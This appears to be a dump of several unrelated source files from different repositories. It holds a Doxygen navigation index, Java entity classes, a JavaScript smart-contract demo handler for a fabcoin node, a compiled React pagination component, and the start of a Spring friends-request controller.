"discrete_8hpp.html#a2ea5db9ee73d9f7a633e5899e4be2c94":[6,0,128,0],
"discrete_8hpp.html#ae5367b53538e888028853607e1c522a4":[6,0,128,1],
"discrete_8hpp_source.html":[6,0,128],
"divide_8hpp.html":[6,0,129],
"divide_8hpp.html#a130f8bc6ccdb70da4cfb245659bc61af":[6,0,129,4],
"divide_8hpp.html#a2389581759aa0446030642193638ef63":[6,0,129,0],
"divide_8hpp.html#a48c5c456736ced98b946e89b573c204e":[6,0,129,2],
"divide_8hpp.html#a7d83e88182dd99da3ad09e76bb916a35":[6,0,129,6],
"divide_8hpp.html#a85d01a50833bff37f13437cdd3e1a1a0":[6,0,129,1],
"divide_8hpp.html#a9b10ead8c068b9b473023c993dc25d7c":[6,0,129,8],
"divide_8hpp.html#aad734f111f1fc140c2c3c8fc84f398b5":[6,0,129,7],
"divide_8hpp.html#ade8f0271af8c94c0a0e1166aba83a619":[6,0,129,5],
"divide_8hpp.html#aed2d517035fdd5539971fa0c1dcb61df":[6,0,129,3],
"divide_8hpp_source.html":[6,0,129],
"dot_8hpp.html":[6,0,130],
"dot_8hpp.html#a2c9414f356ae2025a7cde3a192d6d67d":[6,0,130,0],
"dot_8hpp.html#a6ab78d4355c57b053b6e44f710d60528":[6,0,130,2],
"dot_8hpp.html#abfdbde62bdc084a9b8f9a894fa173c40":[6,0,130,1],
"dot_8hpp_source.html":[6,0,130],
"dump_8hpp.html":[6,0,132],
"dump_8hpp.html#af6e71bd96dbc78f9ca018d2da0a7e653":[6,0,132,0],
"dump_8hpp_source.html":[6,0,132],
"ellint__1_8hpp.html":[6,0,133],
"ellint__1_8hpp.html#a0198bebbecba53e96b36d270be457490":[6,0,133,0],
"ellint__1_8hpp.html#aa7fd769db69bde9583f039306c011816":[6,0,133,1],
"ellint__1_8hpp_source.html":[6,0,133],
"ellint__2_8hpp.html":[6,0,134],
"ellint__2_8hpp.html#a920986b87a9c40529343491bebdadfe0":[6,0,134,0],
"ellint__2_8hpp.html#ab9c4568493afa63db21d5b88f3c2a82d":[6,0,134,1],
"ellint__2_8hpp_source.html":[6,0,134],
"ellint__3_8hpp.html":[6,0,135],
"ellint__3_8hpp.html#aaf7e9aa3cce2502f67735c787588a2eb":[6,0,135,1],
"ellint__3_8hpp.html#ab04eafe87336f4206d63b804dc8653ca":[6,0,135,0],
"ellint__3_8hpp_source.html":[6,0,135],
"empty_8hpp.html":[6,0,136],
"empty_8hpp.html#a3da6e6c01236f9c2af8591a890f7d717":[6,0,136,1],
"empty_8hpp.html#a47dcd15b30a7fd2b977377ebb37cbdb6":[6,0,136,0],
"empty_8hpp_source.html":[6,0,136],
"empty__like_8hpp.html":[6,0,137],
"empty__like_8hpp.html#ad03bf017e6cc91a4169134de885bb9ad":[6,0,137,0],
"empty__like_8hpp_source.html":[6,0,137],
"endianess_8hpp.html":[6,0,139],
"endianess_8hpp.html#a6d1bce5e0cf3f24f84a50b945eec7a26":[6,0,139,0],
"endianess_8hpp_source.html":[6,0,139],
"equal_8hpp.html":[6,0,140],
"equal_8hpp.html#a7440518ae70823ac15ea1711d8df7bfc":[6,0,140,0],
"equal_8hpp_source.html":[6,0,140],
"erf_8hpp.html":[6,0,141],
"erf_8hpp.html#a5b7ac05949538787c3fdec373cb05126":[6,0,141,0],
"erf_8hpp.html#a8b2da132f8a6d86ea0bcce34819d1833":[6,0,141,1],
"erf_8hpp_source.html":[6,0,141],
"erf__inv_8hpp.html":[6,0,142],
"erf__inv_8hpp.html#a0f66785ec1e2643dd4c932ff7cae61a4":[6,0,142,1],
"erf__inv_8hpp.html#abab69146b99ff384c6de4a24da69a780":[6,0,142,0],
"erf__inv_8hpp_source.html":[6,0,142],
"erfc_8hpp.html":[6,0,143],
"erfc_8hpp.html#a1673dca59c73c85eedf077fb62aab5d7":[6,0,143,1],
"erfc_8hpp.html#a8671b7ab0e06230889f4a0cf417a248f":[6,0,143,0],
"erfc_8hpp_source.html":[6,0,143],
"erfc__inv_8hpp.html":[6,0,144],
"erfc__inv_8hpp.html#a3c9551b639e79ce3024fef298f4ace8c":[6,0,144,0],
"erfc__inv_8hpp.html#a653404a544d777c6d7d636a207ee7bca":[6,0,144,1],
"erfc__inv_8hpp_source.html":[6,0,144],
"essentially_equal_8hpp.html":[6,0,146],
"essentially_equal_8hpp.html#a139da62fc9c51ae191e7451bb4edb706":[6,0,146,0],
"essentially_equal_8hpp.html#a7e935ef90aaa774b37e6ab4b5316e01f":[6,0,146,1],
"essentially_equal_8hpp.html#a963b90e7c9a3b057a924298750ddf74c":[6,0,146,2],
"essentially_equal_8hpp.html#aedd8afd691cf9f5a8f8e12c9ca33743a":[6,0,146,3],
"essentially_equal_8hpp_source.html":[6,0,146],
"examples.html":[7],
"exp2_8hpp.html":[6,0,148],
"exp2_8hpp.html#a0595c87603ad5c35ddc78eab15148db7":[6,0,148,0],
"exp2_8hpp.html#aafbab1d2bd67c753fb1656e037bd8b1d":[6,0,148,1],
"exp2_8hpp_source.html":[6,0,148],
"exp_8hpp.html":[6,0,147],
"exp_8hpp.html#a4069791fefff15148813bbbbadf064b1":[6,0,147,0],
"exp_8hpp.html#ad7e555d480465930a7ac44f4ab39eea7":[6,0,147,1],
"exp_8hpp_source.html":[6,0,147],
"expint_8hpp.html":[6,0,149],
"expint_8hpp.html#a23097c9d953be37f1399154274ba2ff1":[6,0,149,1],
"expint_8hpp.html#a98e6e3ad00faf7aef9f90e1c187f49b0":[6,0,149,0],
"expint_8hpp_source.html":[6,0,149],
"expm1_8hpp.html":[6,0,150],
"expm1_8hpp.html#a1f8b7ba3bb64b868fc41508d6912afab":[6,0,150,1],
"expm1_8hpp.html#ac1e31d2bff523a5936799445f16d11af":[6,0,150,0],
"expm1_8hpp_source.html":[6,0,150],
"exponential_8hpp.html":[6,0,151],
"exponential_8hpp.html#a278212d1b177cb2bba47215d083bb10f":[6,0,151,1],
"exponential_8hpp.html#a5d71db2fa4d818d737554405776d2aea":[6,0,151,0],
"exponential_8hpp_source.html":[6,0,151],
"extract_8hpp.html":[6,0,152],
"extract_8hpp.html#af75594a13a627d4b014cf04749324571":[6,0,152,0],
"extract_8hpp_source.html":[6,0,152],
"extreme_value_8hpp.html":[6,0,153],
"extreme_value_8hpp.html#a11144426dec05283d6c682e0e532af7e":[6,0,153,1],
"extreme_value_8hpp.html#a6a5f569b594585794e6b268576d2e587":[6,0,153,0],
"extreme_value_8hpp_source.html":[6,0,153],
"eye_8hpp.html":[6,0,154],
"eye_8hpp.html#a1af40ed299fe04e075ca80d0d00dfba0":[6,0,154,1],
"eye_8hpp.html#a944a26b6ffe66b39ab9ba6972906bf55":[6,0,154,2],
"eye_8hpp.html#aa5328556ac755d5aafbe0f0e5d0c7af3":[6,0,154,0],
"eye_8hpp_source.html":[6,0,154],
"f_8hpp.html":[6,0,155],
"f_8hpp.html#a00229c23da25284daf436c0a338ea25c":[6,0,155,1],
"f_8hpp.html#aabf17da1f94e6da4ec99085feca10799":[6,0,155,0],
"f_8hpp_source.html":[6,0,155],
"factorial_8hpp.html":[6,0,156],
"factorial_8hpp.html#a429b2caa6cf7fcbdba8ce3184c0367e3":[6,0,156,1],
"factorial_8hpp.html#a7ab9b16b9bcb43038db57b7d21a90304":[6,0,156,0],
"factorial_8hpp_source.html":[6,0,156],
"files.html":[6,0],
"fill_corners_8hpp.html":[6,0,158],
"fill_corners_8hpp.html#ac2c4c5858898760f48e5aba06ad0eb3c":[6,0,158,1],
"fill_corners_8hpp.html#ac78b1c70b5d7e26d6013674cdb84690a":[6,0,158,0],
"fill_corners_8hpp_source.html":[6,0,158],
"fill_diagnol_8hpp.html":[6,0,159],
"fill_diagnol_8hpp.html#a7c40717fa80c513ecbb943859d9d1ac2":[6,0,159,0],
"fill_diagnol_8hpp_source.html":[6,0,159],
"find_8hpp.html":[6,0,161],
"find_8hpp.html#a8eaa82071f16b2654f11096247ba10e5":[6,0,161,0],
"find_8hpp_source.html":[6,0,161],
"fix_8hpp.html":[6,0,162],
"fix_8hpp.html#aa2d5bc309911a5c6a79324691cf7ea27":[6,0,162,0],
"fix_8hpp.html#af259d081804c4be2d33e3a00e937b79c":[6,0,162,1],
"fix_8hpp_source.html":[6,0,162],
"flatnonzero_8hpp.html":[6,0,163],
"flatnonzero_8hpp.html#a1564bf5bf94b5a6d8b55850e2a956407":[6,0,163,0],
"flatnonzero_8hpp_source.html":[6,0,163],
"flatten_8hpp.html":[6,0,164],
"flatten_8hpp.html#ae968142455e50b994f534186693934dd":[6,0,164,0],
"flatten_8hpp_source.html":[6,0,164],
"flip_8hpp.html":[6,0,165],
"flip_8hpp.html#ab17a2f12bb2bea50a74c2ed41b30fdb2":[6,0,165,0],
"flip_8hpp_source.html":[6,0,165],
"fliplr_8hpp.html":[6,0,166],
"fliplr_8hpp.html#ae316eb25ff89e7999a24221c91f8d395":[6,0,166,0],
"fliplr_8hpp_source.html":[6,0,166],
"flipud_8hpp.html":[6,0,167],
"flipud_8hpp.html#a0241fc364ae8002c42cd4d452c897e26":[6,0,167,0],
"flipud_8hpp_source.html":[6,0,167],
"floor_8hpp.html":[6,0,168],
"floor_8hpp.html#a832da7fc615ea4e1da7bed94a4488ea6":[6,0,168,1],
"floor_8hpp.html#a85531048cade0ac3a1b4e8d6e01ff6fe":[6,0,168,0],
"floor_8hpp_source.html":[6,0,168],
"floor__divide_8hpp.html":[6,0,169],
"floor__divide_8hpp.html#ab299e0245c7a703a9506ce6f39d9d8e4":[6,0,169,0],
"floor__divide_8hpp.html#ae8e2b2ae79d7a56eefd11986a6de9b21":[6,0,169,1],
"floor__divide_8hpp_source.html":[6,0,169],
"fmax_8hpp.html":[6,0,170],
"fmax_8hpp.html#a99c7f7c680632be6a42ebd6b923df328":[6,0,170,0],
"fmax_8hpp.html#aebbd1fbc64f00fdeaae6c8cfdf6a7f59":[6,0,170,1],
"fmax_8hpp_source.html":[6,0,170],
"fmin_8hpp.html":[6,0,171],
"fmin_8hpp.html#a7cd8e4c771d0676279f506f9d7e949e0":[6,0,171,1],
"fmin_8hpp.html#add4b4f64b2991ac90b24c93ce10a2b80":[6,0,171,0],
"fmin_8hpp_source.html":[6,0,171],
"fmod_8hpp.html":[6,0,172],
"fmod_8hpp.html#a6894e06b913479ce699cba7dbce5bc93":[6,0,172,1],
"fmod_8hpp.html#a87bf4f8636ec0237d958c2ec1d9f1a89":[6,0,172,0],
"fmod_8hpp_source.html":[6,0,172],
"frombuffer_8hpp.html":[6,0,173],
"frombuffer_8hpp.html#ac0d91788bdc0924b82e9a38302d71316":[6,0,173,0],
"frombuffer_8hpp_source.html":[6,0,173],
"fromfile_8hpp.html":[6,0,174],
"fromfile_8hpp.html#a1f10b3d839d24d71df9c92e3f9794a14":[6,0,174,0],
"fromfile_8hpp.html#aa344c64ebbe94231d377f99775606c68":[6,0,174,1],
"fromfile_8hpp_source.html":[6,0,174],
"fromiter_8hpp.html":[6,0,175],
"fromiter_8hpp.html#a17c629bae4e06fe95b23d2b5799148f0":[6,0,175,0],
"fromiter_8hpp_source.html":[6,0,175],
"full_8hpp.html":[6,0,176],
"full_8hpp.html#a139698e3756d4cb9b021c9d97e200bda":[6,0,176,2],
"full_8hpp.html#a64e56324bce64094973a2da35548178d":[6,0,176,1],
"full_8hpp.html#ac09334ce9ac6c4c140bbae68e8ce1a6c":[6,0,176,0],
"full_8hpp_source.html":[6,0,176],
"full__like_8hpp.html":[6,0,177]
};
|
DylanPachecoCoder/matricula-aluno
|
src/dominio/Semestre.java
|
<gh_stars>0
package dominio;
/**
 * Domain entity representing an academic semester: a calendar year plus a
 * term label within that year.
 */
public class Semestre extends EntidadeDominio {
    /** Calendar year of the semester. */
    private int ano;
    /** Term label within the year (plain String; presumably "1"/"2" — confirm with callers). */
    private String semestre;

    public Semestre(int ano, String semestre) {
        this.ano = ano;
        this.semestre = semestre;
    }

    public int getAno() {
        return ano;
    }

    public void setAno(int ano) {
        this.ano = ano;
    }

    // NOTE(review): accessor pair is named "...Enum" although the backing
    // field is a plain String, not an enum.
    public String getSemestreEnum() {
        return semestre;
    }

    public void setSemestreEnum(String semestre) {
        this.semestre = semestre;
    }
}
|
sinoz/project-56
|
app/models/GameCategory.java
|
package models;
import io.ebean.Model;
import play.data.validation.Constraints;
import javax.persistence.Entity;
import javax.persistence.Id;
/**
 * A category of types of games.
 *
 * Persisted as the {@code game_category} table via Ebean.
 *
 * @author <NAME>
 */
@Entity(name = "game_category")
public final class GameCategory extends Model {
    /** The primary key of the category. */
    @Id
    private int id;

    /** The name of the game. */
    @Constraints.Required
    private String name;

    /** The link to the image for this game. */
    private String image;

    /** General information about the game. */
    private String description;

    /** Genre of the game. */
    private String genre;

    /** Search weight/counter for this category. */
    // NOTE(review): semantics inferred from the name only — confirm against callers.
    private int search;

    public int getId() {
        return id;
    }

    public void setId(int id) {
        this.id = id;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public String getImage() {
        return image;
    }

    public void setImage(String image) {
        this.image = image;
    }

    public String getDescription() {
        return description;
    }

    public void setDescription(String description) {
        this.description = description;
    }

    public String getGenre() {
        return genre;
    }

    public void setGenre(String genre) {
        this.genre = genre;
    }

    public int getSearch() {
        return search;
    }

    public void setSearch(int search) {
        this.search = search;
    }
}
|
blockchaingate/Kanban
|
src-vanilla/external_connections/fabcoin/handlers_smart_contract.js
|
"use strict";
const solidity = require('./../../solidity_abi').solidity;
const encodingDefault = require('../../crypto/encodings').encodingDefault;
const fabcoinRPC = require('./rpc');
const ResponseWrapper = require('../../response_wrapper').ResponseWrapper;
var hashers = require('../../crypto/hashes').hashes;
var cryptoKanban = require('../../crypto/crypto_kanban');
var crypto = require('crypto');
// Returns the process-wide fabcoin RPC handler registry. Resolved lazily on
// every call so the global may be installed after this module is loaded.
function getRPCHandlers() {
  return global.fabcoinHandlersRPC;
}
/**
 * Holds the demo workflow state: the smart contract registered for this
 * process and its parsed ABI.
 */
function Demo() {
  /** @type {string} Contract id set by demoRegisterSmartContractAndABI. */
  this.smartContractId = "";
  // Parsed ABI of the registered contract; null until registration happens.
  this.ABI = null;
}
/**
 * Registers a smart contract id and its (URL-escaped, JSON) ABI for the demo.
 * A contract may be registered only once per process; repeated calls return
 * the existing registration with an explanatory message.
 */
Demo.prototype.demoRegisterSmartContractAndABI = function (
  /** @type {ResponseWrapper} */
  response,
  theArgumentsUnused,
  queryCommand,
) {
  var result = { input: queryCommand };
  var alreadyRegistered =
    this.smartContractId !== "" &&
    this.smartContractId !== null &&
    this.smartContractId !== undefined;
  if (alreadyRegistered) {
    result.resultHTML =
      `<b style = 'color:red'>Smart contract already registered. </b>` +
      `If you want to register a new one, please restart the system manually. ` +
      `Attached are the registered contract id and ABI. `;
    result.smartContractId = this.smartContractId;
    result.ABI = this.ABI;
    response.writeHead(200);
    response.end(JSON.stringify(result));
    return;
  }
  this.smartContractId = queryCommand.smartContractId;
  try {
    console.log("Incoming smart contract abi: " + queryCommand.ABI);
    // The ABI arrives URL-escaped; decode it before JSON-parsing.
    this.ABI = JSON.parse(unescape(queryCommand.ABI));
    result.smartContractId = this.smartContractId;
    result.ABI = this.ABI;
    // Make the freshly registered contract the default target of the
    // solidity helper module.
    solidity.contractIdDefault = this.smartContractId;
    solidity.ABI = this.ABI;
  } catch (e) {
    result.error = `Failed to parse the smart contract ABI. ${e}`;
  }
  response.writeHead(200);
  response.end(JSON.stringify(result));
}
/**
 * Verifies that both a smart contract id and an ABI have been registered.
 * On failure it writes a 200 response describing what is missing and
 * returns false; callers must abort their flow in that case.
 *
 * @param {ResponseWrapper} response used only to report the failure
 * @returns {boolean} true when the demo is fully initialized
 */
Demo.prototype.isInitialized = function (response) {
  var result = {
    error: null,
    help: "Please call the demoRegisterSmartContractAndABI to register a new smart contract. "
  };
  if (this.ABI === undefined || this.ABI === null) {
    result.error = `ABI not intialized.`;
  }
  if (this.smartContractId === "" || this.smartContractId === null || this.smartContractId === undefined) {
    result.label = "Smart contract id not initialized. ";
    // Bug fix: previously only result.label was set here, so a missing
    // contract id alone did not trip the error check below and the caller
    // proceeded as if initialized. Record it as an error as well.
    result.error = (result.error === null ? "" : result.error) + result.label;
  }
  if (result.error !== null) {
    response.writeHead(200);
    response.end(JSON.stringify(result));
    return false;
  }
  return true;
}
/**
 * Registers a corporation in the demo smart contract.
 * Flow: parse the supplied public key, derive its testnet FAB address,
 * then ask the node to dump the matching private key (which proves the
 * wallet controls the address) before continuing in Part2.
 */
Demo.prototype.demoRegisterCorporation = function (
  /** @type {ResponseWrapper} */
  response,
  theArgumentsUnused,
  queryCommand,
) {
  if (! this.isInitialized(response)) {
    // isInitialized has already written the error response.
    return;
  }
  var result = {};
  result.input = queryCommand;
  var curvePoint = new cryptoKanban.CurvePoint();
  try {
    curvePoint.fromArbitrary(queryCommand.corporationPublicKey);
  } catch (e) {
    result.error = `Failed to extract public key from your input ${queryCommand.corporationPublicKey}`;
    response.writeHead(400);
    return response.end(JSON.stringify(result));
  }
  // Split the serialized point into its 1-byte prefix and the curve
  // coordinates, both hex-encoded, as expected by the contract ABI packing.
  result.input.publicKeyPrefix = curvePoint.toBytes().slice(0, 1).toString('hex');
  result.input.publicKeyCurvePoint = curvePoint.toBytes().slice(1).toString('hex');
  var fabAddressBytes = curvePoint.computeFABAddressTestnetBytes();
  result.input.fabAddress = fabAddressBytes.toString('hex');
  result.input.fabAddressBase58 = encodingDefault.toBase58Check(fabAddressBytes);
  var newCommand = {
    rpcCall: fabcoinRPC.rpcCalls.dumpPrivateKey.rpcCall,
    address: result.input.fabAddressBase58,
  };
  // NOTE(review): dumpPrivateKey output is attached to the result in Part2 —
  // confirm exposing it is acceptable even for a demo.
  getRPCHandlers().handleRPCArguments(response, newCommand, this.demoRegisterCorporationPart2.bind(this, result));
}
/**
 * Continuation of demoRegisterCorporation: receives the dumpPrivateKey
 * result, aborts if the wallet does not know the secret, otherwise packs a
 * registerCompany contract call and submits it via sendToContract.
 */
Demo.prototype.demoRegisterCorporationPart2 = function (result, response, dataParsed) {
  result.privateKeyResponse = dataParsed;
  // The RPC layer can return the string "null" as well as a real null.
  if (result.privateKeyResponse.result === null || result.privateKeyResponse.result === "null") {
    result.error = `Error: I do not know the secret for the given public key. `;
    response.writeHead(200);
    return response.end(JSON.stringify(result));
  }
  result.abiPacking = solidity.getABIPackingForFunction("registerCompany", result.input);
  var sendToContract = fabcoinRPC.rpcCalls.sendToContract;
  var newCommand = {
    rpcCall: sendToContract.rpcCall,
    contractId: this.smartContractId,
    data: result.abiPacking,
    amount: 0,
  };
  getRPCHandlers().handleRPCArguments(response, newCommand, this.demoRegisterCorporationPart3.bind(this, result));
}
/**
 * Continuation: records the sendToContract outcome, then mines one block so
 * the registration transaction gets confirmed.
 */
Demo.prototype.demoRegisterCorporationPart3 = function (result, response, dataParsed) {
  result.sendToContractResult = dataParsed;
  var mineOneBlock = {
    rpcCall: fabcoinRPC.rpcCalls.generateBlocks.rpcCall,
    numberOfBlocks: 1,
  };
  getRPCHandlers().handleRPCArguments(response, mineOneBlock, this.demoRegisterCorporationPart4.bind(this, result));
}
/** Final step: attach the mining result and reply with the whole trace. */
Demo.prototype.demoRegisterCorporationPart4 = function (result, response, dataParsed) {
  result.generateOneBlock = dataParsed;
  response.writeHead(200);
  response.end(JSON.stringify(result));
}
/** Queries the contract's getNonce view; the reply is sent in getAllNoncePart2. */
Demo.prototype.demoGetNonce = function (response) {
  if (!this.isInitialized(response)) {
    return;
  }
  var result = {
    query: solidity.getQueryCallContractForFunction("getNonce", {}),
  };
  getRPCHandlers().handleRPCArguments(response, result.query, this.getAllNoncePart2.bind(this, result));
}
/**
 * Continuation of demoGetNonce: unpacks the callcontract output and replies
 * with just the current nonce, or with the accumulated trace on failure.
 */
Demo.prototype.getAllNoncePart2 = function (result, response, parsedData) {
  result.parsedData = parsedData;
  var unpacked;
  try {
    unpacked = solidity.unpackABIResultForFunction("getNonce", parsedData.result.executionResult.output);
  } catch (e) {
    result.error = `Failed to get nonce: ${e}`;
    response.writeHead(200);
    response.end(JSON.stringify(result));
    return;
  }
  response.writeHead(200);
  response.end(JSON.stringify(unpacked.nonceCurrent));
}
/**
 * Issues loyalty points: fetches the contract's current nonce first, then
 * continues in issuePointsPart2 with the original query.
 * (Leftover DEBUG console.log statements removed.)
 */
Demo.prototype.demoIssuePoints = function (
  /** @type {ResponseWrapper} */
  response,
  theArgumentsUnused,
  queryCommand,
) {
  if (!this.isInitialized(response)) {
    return;
  }
  var nonceQuery = solidity.getQueryCallContractForFunction("getNonce", {});
  getRPCHandlers().handleRPCArguments(response, nonceQuery, this.issuePointsPart2.bind(this, queryCommand));
}
/**
 * Continuation: decodes the nonce and the node's public key from the
 * getNonce call, then fetches the registered corporations before building
 * the receipt in issuePointsPart3.
 */
Demo.prototype.issuePointsPart2 = function (queryCommand, response, dataParsed) {
  var result = {
    query: queryCommand,
    nonce: solidity.unpackABIResultForFunction("getNonce", dataParsed.result.executionResult.output),
  };
  result.nonceToNumber = Number(result.nonce);
  result.publicKey = dataParsed.result.publicKey;
  this.demoGetAllCorporations(response, this.issuePointsPart3.bind(this, result));
}
/**
 * Continuation: builds a demo-grade signed receipt for the point issuance
 * and mines one block to confirm.
 *
 * Bug fix: demoGetAllCorporations delivers its minimal corporations listing
 * as the third argument; previously this function assigned `result` to
 * itself (`result.getAllCorporationsResult = result`), creating a circular
 * self-reference and silently dropping the listing.
 */
Demo.prototype.issuePointsPart3 = function (result, response, corporationsFound) {
  result.getAllCorporationsResult = corporationsFound;
  // Demo-only cryptography: random salt folded into a keccak receipt and a
  // random placeholder "signature".
  var nonKeccaked = result.query.corporationNameHex + result.query.moneySpent + JSON.stringify(result.nonce) + crypto.randomBytes(5);
  var signature = "65" + crypto.randomBytes(64).toString('hex');
  var keccakedReceipt = hashers.keccak_ToHex(nonKeccaked);
  result.transaction = {
    companyName: encodingDefault.fromHex(result.query.corporationNameHex).toString(),
    amount: result.query.moneySpent,
    nonce: keccakedReceipt,
    signature: signature
  };
  result.transaction.info = `${result.transaction.companyName}, ${result.transaction.amount}, ${result.transaction.nonce.slice(0, 6)}`;
  // {info: "Company, amount, hex"}
  var newCommand = {
    rpcCall: fabcoinRPC.rpcCalls.generateBlocks.rpcCall,
    numberOfBlocks: 1,
  };
  getRPCHandlers().handleRPCArguments(response, newCommand, this.issuePointsPart4.bind(this, result));
}
/** Final step of point issuance: reply with the signed receipt only. */
Demo.prototype.issuePointsPart4 = function (result, response, dataParsed) {
  response.writeHead(200);
  response.end(JSON.stringify(result.transaction));
}
/**
 * Lists all companies registered in the contract.
 * (Leftover DEBUG console.log removed.)
 *
 * @param {ResponseWrapper} response outgoing response
 * @param {function=} callbackOverridesResponse when provided, receives
 *        (response, minimalListing) and becomes responsible for replying
 */
Demo.prototype.demoGetAllCorporations = function (response, callbackOverridesResponse) {
  if (!this.isInitialized(response)) {
    return;
  }
  var result = {};
  result.query = solidity.getQueryCallContractForFunction("getAllCompanies", {});
  getRPCHandlers().handleRPCArguments(response, result.query, this.getAllCorporationsPart2.bind(this, result, callbackOverridesResponse));
}
/**
 * Continuation: unpacks the getAllCompanies output into a minimal
 * {companyName: {creationNumber, publicKey}} map and replies with it (or
 * hands it to the override callback).
 *
 * Bug fixes: on an unpacking error the function used to send the error
 * response and then FALL THROUGH, replying a second time or invoking the
 * callback with an empty listing — it now returns immediately. Leftover
 * DEBUG console.logs removed.
 */
Demo.prototype.getAllCorporationsPart2 = function (result, callbackOverridesResponse, response, dataParsed) {
  result.resultData = dataParsed;
  var resultMinimal = {};
  try {
    result.unpacked = solidity.unpackABIResultForFunction("getAllCompanies", dataParsed.result.executionResult.output);
    var unpacked = result.unpacked;
    for (var i = 0; i < unpacked.companyNames.length; i++) {
      var currentName = encodingDefault.fromHex(unpacked.companyNames[i]).toString();
      var creationNumber = Number(unpacked.companyCreationNumbers[i]);
      // Reassemble the key: one prefix byte (2 hex chars) + curve point hex.
      var publicKey = unpacked.publicKeyPrefixes[i].slice(0, 2) + unpacked.publicKeyCurvePoints[i];
      resultMinimal[currentName] = {
        creationNumber: creationNumber,
        publicKey: publicKey,
      };
    }
  } catch (e) {
    result.error = `Error unpacking call contract result. ${e}`;
    response.writeHead(200);
    response.end(JSON.stringify(result));
    return;
  }
  if (typeof callbackOverridesResponse === "function") {
    return callbackOverridesResponse(response, resultMinimal);
  }
  response.writeHead(200);
  response.end(JSON.stringify(resultMinimal));
}
var demo = new Demo()
module.exports = {
demo
}
|
DonaldPeat/ether-campaign
|
node_modules/semantic-ui-react/dist/commonjs/addons/Pagination/PaginationItem.js
|
<gh_stars>0
'use strict';
Object.defineProperty(exports, "__esModule", {
value: true
});
var _extends2 = require('babel-runtime/helpers/extends');
var _extends3 = _interopRequireDefault(_extends2);
var _objectWithoutProperties2 = require('babel-runtime/helpers/objectWithoutProperties');
var _objectWithoutProperties3 = _interopRequireDefault(_objectWithoutProperties2);
var _classCallCheck2 = require('babel-runtime/helpers/classCallCheck');
var _classCallCheck3 = _interopRequireDefault(_classCallCheck2);
var _createClass2 = require('babel-runtime/helpers/createClass');
var _createClass3 = _interopRequireDefault(_createClass2);
var _possibleConstructorReturn2 = require('babel-runtime/helpers/possibleConstructorReturn');
var _possibleConstructorReturn3 = _interopRequireDefault(_possibleConstructorReturn2);
var _inherits2 = require('babel-runtime/helpers/inherits');
var _inherits3 = _interopRequireDefault(_inherits2);
var _invoke2 = require('lodash/invoke');
var _invoke3 = _interopRequireDefault(_invoke2);
var _propTypes = require('prop-types');
var _propTypes2 = _interopRequireDefault(_propTypes);
var _react = require('react');
var _lib = require('../../lib');
var _MenuItem = require('../../collections/Menu/MenuItem');
var _MenuItem2 = _interopRequireDefault(_MenuItem);
// Babel helper: normalizes CommonJS/ES-module interop — ES modules pass
// through untouched, plain CommonJS exports are wrapped as { default: obj }.
function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }
/**
* An item of a pagination.
*/
var PaginationItem = function (_Component) {
(0, _inherits3.default)(PaginationItem, _Component);
function PaginationItem() {
var _ref;
var _temp, _this, _ret;
(0, _classCallCheck3.default)(this, PaginationItem);
for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
args[_key] = arguments[_key];
}
return _ret = (_temp = (_this = (0, _possibleConstructorReturn3.default)(this, (_ref = PaginationItem.__proto__ || Object.getPrototypeOf(PaginationItem)).call.apply(_ref, [this].concat(args))), _this), _this.handleClick = function (e) {
var type = _this.props.type;
if (type !== 'ellipsisItem') (0, _invoke3.default)(_this.props, 'onClick', e, _this.props);
}, _this.handleKeyDown = function (e) {
(0, _invoke3.default)(_this.props, 'onKeyDown', e, _this.props);
if (_lib.keyboardKey.getCode(e) === _lib.keyboardKey.Enter) (0, _invoke3.default)(_this.props, 'onClick', e, _this.props);
}, _temp), (0, _possibleConstructorReturn3.default)(_this, _ret);
}
(0, _createClass3.default)(PaginationItem, [{
key: 'render',
value: function render() {
var _props = this.props,
active = _props.active,
ariaLabel = _props.ariaLabel,
type = _props.type,
rest = (0, _objectWithoutProperties3.default)(_props, ['active', 'ariaLabel', 'type']);
var disabled = type === 'ellipsisItem';
return _MenuItem2.default.create((0, _extends3.default)({}, rest, {
active: active,
'aria-current': active,
'aria-label': ariaLabel,
disabled: disabled,
onClick: this.handleClick,
onKeyDown: this.handleKeyDown,
tabIndex: disabled ? -1 : 0
}));
}
}]);
return PaginationItem;
}(_react.Component);
PaginationItem._meta = {
name: 'PaginationItem',
parent: 'Pagination',
type: _lib.META.TYPES.ADDON
};
PaginationItem.handledProps = ['active', 'ariaLabel', 'onClick', 'onKeyDown', 'type'];
PaginationItem.propTypes = process.env.NODE_ENV !== "production" ? {
/** A pagination item can be active. */
active: _propTypes2.default.bool,
/** A pagination item can have an aria label. */
ariaLabel: _propTypes2.default.string,
/**
* Called on click.
*
* @param {SyntheticEvent} event - React's original SyntheticEvent.
* @param {object} data - All props.
*/
onClick: _propTypes2.default.func,
/**
* Called on key down.
*
* @param {SyntheticEvent} event - React's original SyntheticEvent.
* @param {object} data - All props.
*/
onKeyDown: _propTypes2.default.func,
/** A pagination should have a type. */
type: _propTypes2.default.oneOf(['ellipsisItem', 'firstItem', 'prevItem', 'pageItem', 'nextItem', 'lastItem'])
} : {};
PaginationItem.create = (0, _lib.createShorthandFactory)(PaginationItem, function (content) {
return { content: content };
});
exports.default = PaginationItem;
|
giannhskp/Linked-In-Clone
|
Back End/src/main/java/com/example/demo/controller/FriendsController.java
|
package com.example.demo.controller;
import com.example.demo.dto.FriendsDto;
import com.example.demo.service.AuthService;
import com.example.demo.service.FriendsService;
import lombok.AllArgsConstructor;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.*;
import java.util.List;
/**
 * REST endpoints for managing friendships: sending, accepting, declining
 * and cancelling friend requests, and listing friends. The acting user is
 * always resolved from the current authentication via {@code AuthService}.
 */
@RestController
@RequestMapping("/api/friends/")
@AllArgsConstructor
public class FriendsController {
    FriendsService friendsService;
    AuthService authService;

    /** Sends a friend request from the current user to {@code receiver}. */
    @PostMapping("/request/{receiver}")
    public ResponseEntity<Void> sendFriendRequest(@PathVariable String receiver) {
        friendsService.sendFriendRequest(authService.getCurrentUser(), receiver);
        return new ResponseEntity<>(HttpStatus.OK);
    }

    /** Accepts a pending friend request sent by {@code fromuser}. */
    @PostMapping("/accept/{fromuser}")
    public ResponseEntity<Void> acceptFriendRequest(@PathVariable String fromuser) {
        friendsService.acceptFriendRequest(authService.getCurrentUser(), fromuser);
        return new ResponseEntity<>(HttpStatus.OK);
    }

    /** Declines a pending friend request sent by {@code fromuser}. */
